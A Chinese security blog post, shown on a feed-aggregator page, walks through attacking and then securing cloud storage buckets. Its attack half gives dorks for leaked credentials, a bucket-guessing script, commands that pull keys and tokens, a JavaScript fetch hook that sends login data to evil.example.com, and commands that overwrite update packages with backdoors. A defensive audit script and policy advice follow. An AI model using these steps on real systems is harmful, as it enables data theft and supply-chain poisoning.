惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Security Archives - TechRepublic
WordPress大学
WordPress大学
酷 壳 – CoolShell
酷 壳 – CoolShell
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Microsoft Azure Blog
Microsoft Azure Blog
V
Visual Studio Blog
美团技术团队
GbyAI
GbyAI
The Cloudflare Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
N
Netflix TechBlog - Medium
Jina AI
Jina AI
G
Google Developers Blog
H
Help Net Security
Blog — PlanetScale
Blog — PlanetScale
有赞技术团队
有赞技术团队
Martin Fowler
Martin Fowler
J
Java Code Geeks
F
Fortinet All Blogs
云风的 BLOG
云风的 BLOG
Google DeepMind News
Google DeepMind News
IT之家
IT之家
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
博客园 - 司徒正美
博客园 - Franky
博客园 - 三生石上(FineUI控件)
MyScale Blog
MyScale Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Stack Overflow Blog
Stack Overflow Blog
Y
Y Combinator Blog
阮一峰的网络日志
阮一峰的网络日志
aimingoo的专栏
aimingoo的专栏
博客园_首页
MongoDB | Blog
MongoDB | Blog
T
The Blog of Author Tim Ferriss
U
Unit 42
Hugging Face - Blog
Hugging Face - Blog
M
MIT News - Artificial intelligence
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
雷峰网
雷峰网
博客园 - 【当耐特】
NISL@THU
NISL@THU
Engineering at Meta
Engineering at Meta
P
Proofpoint News Feed
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
G
GRAHAM CLULEY
V
Vulnerabilities – Threatpost
K
Kaspersky official blog

博客园_首页

Linux实操--组管理、权限管理和定时任务 Java + EasyExcel 实现单个接口导出多个Excel Mem0 源码解析系列(二):提示词工程的深度剖析 Openclaw TaskFlow究竟是什么?和普通Skill技能有什么区别 博文阅读密码验证 - 博客园 嘉立创开源:应该是全网MicroPython教程最多的开发板 Hermes Agent 集成实践:从协议到生产 2026年AI编程工具横评:Cursor、Codex、Claude Code、Zed、Windsurf Java程序员必看的RAG入门教程 2026 AI效率神器:Superpowers + Claude Code 保姆级教程 本地大模型部署全攻略:从 0 到 1 玩转 Ollama 【从0到1构建一个ClaudeAgent】内存管理-上下文压缩 .NET 高级开发 | 设计、实现一个事件总线框架 电子小白入门之NE555 3. WorkBuddy:隐藏玩法,一键召唤专家,让 AI 以"专家身份"给你干活 和AI一起搞事情#3:Claude Teammate 游戏开发翻车实录 【OpenClaw】通过 Nanobot 源码学习架构---(7)Memory C# .NET 周刊|2026年3月3期 我在 Debian 11 上把 K8s 单机搭起来了,过程没你想的那么顺(/opt 目录版) 深度学习进阶(七)Data-efficient Image Transformer CLI+Skill搭建浏览器AI自动化框架,告别一切重复枯燥任务 告别Token账单无底洞:OpenClaw本地部署,重塑企业数据主权的唯一解 FastAPI+Vue:文件分片上传+秒传+断点续传,这坑我帮你踩平了! SBTI 爆火后,我做了个程序员版的 CBTI。。已开源 + 附开发过程 多模态检索开始进入工程期:用 Sentence Transformers 搭建可落地的 Multimodal RAG 100多行代码实现一个最简单的Agent(用ReAct) Claude Code 通关手册(八):推荐 5 个 Hooks,代码质量提升 3 倍 老板:“有人截图了!”。安全部门:“收到,马上查暗水印!” - why技术 技术之外,皆是人间 C#/.NET/.NET Core技术前沿周刊 | 第 69 期(2026年4.01-4.12) Snack JSONPath 项目架构分析 Claude Code Buddy 小析:一个非核心功能,如何体现产品的细节完成度 AI新时代下的图床管理方案-Cloudflare图床+MCP+Skills方案指南 化繁为简:顺丰速运App如何通过 HarmonyOS SDK实现专业级空间测量 从零实现富文本编辑器#13-React非编辑节点的内容渲染 AI开发-python-langchain框架(3-23-OpenAI Functions风格Tool Calling智能助手) .NET + AI 进阶实战:基于类的技能开发 - 打造可治理的 Agent 能力模块 【从0到1构建一个ClaudeAgent】规划与协调-技能 上周热点回顾(4.6-4.12) 电子小白的工具三件套:面包板、杜邦线、万能板 单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy:从“我是谁”到“帮我干活” C# 如何减少代码运行时间:7 个实战技巧 基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微 从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控?换个起点,让AI事半功倍 从开始配置漏洞环境到漏洞复现流程 - 難しい 关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊|2026年3月2期 - InCerry 我帮你测过了,测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut PbootCMS 网站内容数量多导致访问慢?这些实用优化方案帮你提速! - 家兴网络技术工作室 上下文工程是什么?过时了么?一文讲明白! - 一枫说码 网站漏洞怎么发现并修复?一篇实用指南(附完整流程) - 家兴网络技术工作室 开了 TUN 模式还是直连?90% 的人都踩过这个坑 Github日报|2026年04月12日 - AI一族 AScript扩展多种脚本语言 - rockey627 AI 学习笔记:Agent 的记忆机制 你能被装进一个文件里吗?——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册(七):给 AI 装上技能包——Skills 完全指南 - 暮色之狐 在浏览器中快速编辑代码:VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill?基于 Deepseek 的蒸馏器,丐版蒸馏方式,简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope,哪个更好? - 苏三说技术 Etsy 把 1000 个 MySQL 分片迁进 Vitess:425TB 数据背后的真正问题不是性能,而是运维规模 MicroPython LVGL基础知识和概念:底层渲染与性能优化 - FreakStudio 数据库草图算法 Python 潮流周刊#146:CPython 引入 Rust 的进展 - 豌豆花下猫 最小生成树 - mofei1116 红日靶场七:从外网入口、容器逃逸到 AD 接管的完整利用链复盘 - YouDiscovered1t 分享四款开源且实用的 Kafka 管理工具 - 追逐时光者 vLLM 权重加载机制全解析:从挑战到理想架构 LCT 学习笔记 - ACehomoxue Avalonia UI 12.0.0 正式发布:架构演进和性能飞跃 - 张善友 当 AI Agent 把调用链拉长,延迟开始成为一门生意 conhost.exe 无法显示 U+2717 - 145a 太秀了,我把自己蒸馏成了 Skill!已开源 - 程序员鱼皮 ASP.NET Core 内存缓存实战:一篇搞懂该怎么配、怎么避坑 基于 Ghostty 带有分割标签页和为 Claude 编程设计的通知终端 - BugShare AI 焊死入口:教育的“操作系统级”重塑 - 郝hai 初级Java开发工程师使用sql脚本编写代码的过程是简单而且不糊涂 - CoderOilStation Claude Code通关手册(六):MCP协议完全指南 - 暮色之狐 边框灯光环绕动画特效实现指南 - Newbe36524 开源:子木蒸馏版的 SEO 审计工具 seo-audit-skill v1.0 我所理解的Python元模型 【从0到1构建一个ClaudeAgent】规划与协调-TodoWrite - 程序员Seven Claude 和 Codex 在审计 Skill 上性能差异探究 - ACai_sec AScript如何实现中文脚本引擎 - rockey627 【渗透测试】HTB Season10 Garfield 全过程wp - dynasty_chenzi Android 开发者为什么必须掌握 AI 能力?端侧视角下的技术变革 树状数组正确性证明 - AC-wyr 你的 AI 焦虑,可能比 AI 本身更危险——ATM 机没有消灭银行柜员,但恐慌消灭了你的判断力 - 我没有三颗心脏 一个拉胯的分库分表方案有多绝望?整个部门都在救火! - 冰河团队 动态规划入门必学之走方格问题 - Ofnoname PostgREST 与 PostgreSQL 角色权限配置全解析(生产级实践) - SheepDog1998 使用 UEFI 图形输出协议 GOP 在屏幕上显示图像的方法 - 阿源- Claude Code通关手册(五):组建你的AI专家团队,子代理系统 - 暮色之狐 一个程序员到架构师的催婚路之感悟(整整10年后的催婚相亲感悟) - MisterLip 用 Agent Skill 自动生成工作周报 - 赵康
一个公开的存储桶,让我摸进了公司的内网:云存储安全攻防实战
明.Sir · 2026-06-15 · via 博客园_首页

上周一个客户找到我,说他们收到云厂商的安全告警——某个存储桶在凌晨3点被大量下载,疑似数据泄露。客户很慌,问我:"我们的桶设了权限的,怎么还会被拖?"

我笑着说:"你设的权限,怕不是'公开可读'那种权限吧?"

一查,果不其然。一个存放日志归档的S3兼容桶,Bucket Policy配置成了Principal: "*"Effect: "Allow",配上Action: "s3:GetObject"。这不是锁,这是敞着门让人进。

这种案例我一年能碰上十几起。今天就把云存储桶安全攻防的全流程拆开揉碎了讲清楚——从发现到利用,从利用到防御,一条龙。

第一步:如何发现暴露的存储桶

云存储桶的发现,主要分两条路:被动信息收集主动探测

被动收集:Google Hacking + GitHub Dorking

最省力的方式,让搜索引擎帮你找。

# Google dorking 找公开桶
site:oss.aliyuncs.com intitle:"Index of"
site:s3.amazonaws.com "bucket"
site:blob.core.windows.net intitle:"Index of"

# 找暴露的存储桶URL
"Bucket: " "s3.amazonaws.com"
"Endpoint: " "oss-cn-hangzhou.aliyuncs.com"

GitHub也是重灾区。很多开发者在配置文件中硬编码了桶的访问信息,甚至直接把Bucket Policy贴到了公开仓库。

# GitHub 搜索暴露的云存储配置
"aws_access_key_id" AND "s3" language:yaml
"oss_access_key_id" language:json
"storage_account" AND "connection_string" language:python

前两天我随手一搜,就发现了一个包含阿里云OSS AccessKey的公共仓库——用ali-oss SDK配置了完整的写权限。这种属于致命级别的泄露,攻击者拿到后不仅能读数据,还能上传恶意文件。

主动探测:我自己常用的工具链

被动找不完的,主动来扫。

# 安装 S3Scanner 扫描公开桶
pip install s3scanner

# 批量检测桶列表
s3scanner scan --bucket-file buckets.txt --out found.txt

# buckets.txt 内容示例
dev-backup.company.com
prod-logs.company.com
test-assets.company.com
data-analytics.company.com

这里有个关键技巧:桶命名模式预测。一旦你拿到一个公司的一个桶名,按命名规律可以推出其他桶。

import boto3
import re

# 根据已知桶名预测模式
known_bucket = "prod-logs-company"
patterns = [
    known_bucket,
    known_bucket.replace("prod", "dev"),
    known_bucket.replace("prod", "test"),
    known_bucket.replace("logs", "backup"),
    known_bucket.replace("logs", "data"),
    f"{known_bucket}-archive",
    f"{known_bucket}-bak",
]

s3 = boto3.client('s3')
for bucket in patterns:
    try:
        response = s3.list_objects_v2(Bucket=bucket, MaxKeys=1)
        print(f"[+] 可读: {bucket} - {response.get('Contents', [])}")
    except Exception as e:
        code = e.response['Error']['Code']
        if code == 'NoSuchBucket':
            print(f"[-] 不存在: {bucket}")
        elif code == 'AccessDenied':
            print(f"[*] 存在但无权限: {bucket}")

跑一轮下来,经常能扫到意外惊喜——Dev环境的备份桶、测试数据桶,权限往往比Prod松散得多。

第二步:捅开之后的骚操作

找到可读的桶只是开始,真正的价值在于能从桶里挖到什么

数据侦察:目录漫游的艺术

# 递归列出桶内所有文件
aws s3 ls s3://exposed-bucket --recursive --human-readable

# 按大小排序找出"大鱼"
aws s3 ls s3://exposed-bucket --recursive | sort -k3 -rn | head -20

# 搜索敏感关键词
aws s3 ls s3://exposed-bucket --recursive | grep -iE "\.(pem|key|env|config|json|sql|csv|xlsx|pdf|dump)"

一次实战中,我在一个"测试"桶里翻出了以下文件:

  • config/staging.env — 内含数据库连接串和Redis密码
  • backup/db_dump_20260501.sql — 完整的用户表数据
  • deploy/ssh_key_staging.pem — 测试服务器SSH密钥
  • logs/app/2026/04/ — 应用日志,含用户Token和API请求

一条凭证通向一个内网。 拿到那个.pem文件后,我直接SSH到了他们的Staging服务器——而那条Staging环境,竟然和生产环境在同一VPC下。从公开桶到内网漫游,整个过程不到40分钟。

日志中的金矿

千万别小看日志。很多人觉得日志"没什么价值",加密程度也是最松的。

# 从日志中提取API Token
grep -oP '"token":\s*"[^"]+"' app-2026-*.log | sort -u

# 提取IP白名单
grep -oP '"client_ip":\s*"[^"]+"' access.log.* | sort -u

# 提取用户操作记录
grep "ERROR" error.log.* | grep -i "unauthorized\|forbidden\|permission"

我见过最离谱的一次,一个桶里存了半年的Nginx访问日志,里面记满了API请求的完整URL——包括query string里的Token。等于攻击者拿到了一把通往所有内部API的万能钥匙。

第三步:写入权限才是真正的噩梦

比可读桶更可怕的是可写桶

# 检查桶的写入权限
echo "test" > /tmp/test.txt
aws s3 cp /tmp/test.txt s3://exposed-bucket/test_write_permission.txt

# 如果能写入,尝试覆盖关键文件
aws s3 cp /tmp/malicious.js s3://exposed-bucket/static/js/app.js

可写桶的攻击路径:

供应链投毒

如果你的桶被用来托管前端静态资源,攻击者上传一个恶意JS文件:

// 看似正常的埋点代码,实际窃取用户凭证
(function() {
    const originalFetch = window.fetch;
    window.fetch = function(...args) {
        // 偷偷记录请求中的敏感信息
        if (args[0].includes('/api/login') || args[0].includes('/token')) {
            fetch('https://evil.example.com/steal', {
                method: 'POST',
                body: JSON.stringify({url: args[0], body: args[1]?.body})
            });
        }
        return originalFetch.apply(this, args);
    };
})();

如果用户访问的页面加载了这个JS,所有登录信息都会被劫持。而这种攻击最可怕的地方在于——你完全不知道它在发生,直到有用户报告异常。

恶意文件上传导致RCE

更直接的攻击:上传伪装成更新包的恶意文件。

# 覆盖OTA更新包
aws s3 cp /tmp/backdoor.sh s3://exposed-bucket/updates/v2.1.3/update.sh
# 覆盖客户端下载的安装程序
aws s3 cp /tmp/trojan.msi s3://exposed-bucket/downloads/installer-v3.0.msi

第四步:防御指南(说人话版)

讲了这么多攻击,必须把防守也说清楚。下面是我给客户的三道防线

一、最小权限原则 —— 最便宜也最有效的防御

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::my-bucket/*",
      "Condition": {
        "Bool": {"aws:SecureTransport": "false"}
      }
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789:role/app-server"
      },
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::my-bucket/app-data/*"
    }
  ]
}

关键点:

  • 永远不要"Principal": "*"配合"Effect": "Allow"
  • Deny兜底策略:先拒绝所有人,再按需放行
  • 限定SourceIPSecureTransport
  • 使用预签名URL(Presigned URL)替代公开访问

二、自动化扫描 —— 别等人告诉你桶暴露了

#!/usr/bin/env python3
"""云存储桶安全巡检脚本"""
import boto3
import json
from botocore.exceptions import ClientError

def check_bucket_public_access(bucket_name):
    """检查存储桶是否公开可访问"""
    s3 = boto3.client('s3')
    results = {'bucket': bucket_name, 'risks': []}
    
    # 1. 检查Bucket Policy
    try:
        policy = s3.get_bucket_policy(Bucket=bucket_name)
        policy_doc = json.loads(policy['Policy'])
        for statement in policy_doc.get('Statement', []):
            principal = statement.get('Principal', {})
            if principal in ('*', {'AWS': '*'}):
                results['risks'].append({
                    'type': 'PUBLIC_POLICY',
                    'detail': f"Statement allows public: {statement.get('Effect')}"
                })
    except ClientError as e:
        if e.response['Error']['Code'] != 'NoSuchBucketPolicy':
            results['risks'].append({'type': 'POLICY_CHECK_FAILED', 'detail': str(e)})
    
    # 2. 检查ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl.get('Grants', []):
            grantee = grant.get('Grantee', {})
            if grantee.get('URI', '') == 'http://acs.amazonaws.com/groups/global/AllUsers':
                results['risks'].append({
                    'type': 'PUBLIC_ACL',
                    'detail': f"Public {grant['Permission']} via ACL"
                })
    except Exception as e:
        results['risks'].append({'type': 'ACL_FAILED', 'detail': str(e)})
    
    # 3. 检查Block Public Access设置
    try:
        bpa = s3.get_public_access_block(Bucket=bucket_name)
        for k, v in bpa['PublicAccessBlockConfiguration'].items():
            if not v:
                results['risks'].append({
                    'type': 'BPA_DISABLED',
                    'detail': f"{k} is disabled"
                })
    except ClientError:
        results['risks'].append({'type': 'BPA_NOT_CONFIGURED'})
    
    return results

# 扫描所有桶
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
for b in buckets:
    result = check_bucket_public_access(b['Name'])
    if result['risks']:
        print(f"[!] {b['Name']}: {len(result['risks'])} 个风险")
        for r in result['risks']:
            print(f"    {r['type']}: {r['detail']}")

把这脚本挂到CI/CD或者定时任务里,每天跑一次。发现风险直接飞书/钉钉告警。

三、日志审计与异常检测

# 开启S3访问日志(发到独立的审计桶)
aws s3api put-bucket-logging \
  --bucket prod-data \
  --bucket-logging-status '{
    "LoggingEnabled": {
      "TargetBucket": "audit-logs-prod",
      "TargetPrefix": "s3-access/prod-data/"
    }
  }'

# 分析异常访问模式
# 1. 来自非预期地域的访问
# 2. 下载量突然暴增(数据拖取)
# 3. 非工作时间的大量访问
# 4. 批量枚举对象(403连发)

我在一个客户的审计日志里发现,某个桶在凌晨的下载量是白天的10倍,来源IP来自东欧。客户一查,果然是被Web爬虫抓到了公开桶。

写在最后

云存储桶安全的核心问题从来不是技术——是意识

每次我处理这类事件,90%的场景都是:开发图方便、运维没复查、安全没覆盖到。一条错误的Bucket Policy,几个字符的问题,带来的后果可能是整个公司数据资产暴露。

给所有安全从业者和运维一句实在话:

每天花5分钟检查一下你们公司的存储桶权限,比你买一百万的WAF都管用。

别等到云厂商的告警邮件发到你CEO邮箱,再去查是哪条Policy出了问题。



关注「安全值班室」公众号

每天实战攻防案例 + 安全干货

关注安全值班室